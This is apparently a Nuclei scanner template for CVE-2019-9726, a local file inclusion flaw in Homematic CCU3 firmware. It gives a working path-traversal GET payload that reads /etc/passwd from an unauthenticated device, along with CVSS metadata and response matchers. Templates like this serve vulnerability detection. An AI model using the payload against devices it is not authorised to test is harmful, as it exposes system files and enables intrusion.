id: CVE-2019-9726

info:
  name: Homematic CCU3 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface.
  remediation: |
    Apply the latest security patches or updates provided by the vendor.
  reference:
    - https://atomic111.github.io/article/homematic-ccu3-fileread
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9726
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9726
    cwe-id: CWE-22
    epss-score: 0.02964
    epss-percentile: 0.89723
    cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eq-3
    product: ccu3_firmware
  tags: cve,cve2019,homematic,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/.%00./.%00./etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "bin:.*:0:0:"
        condition: or

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100cb3c1722c875c7d0858d2651eb3411fff8c0c38ebf1877b26dd5f9b81228eaca02207d040978b79274784b1c6208fc52b6e1b9c33ae70ea8a22e66055411518c9305:922c64590222798bb761d5b6d8e72950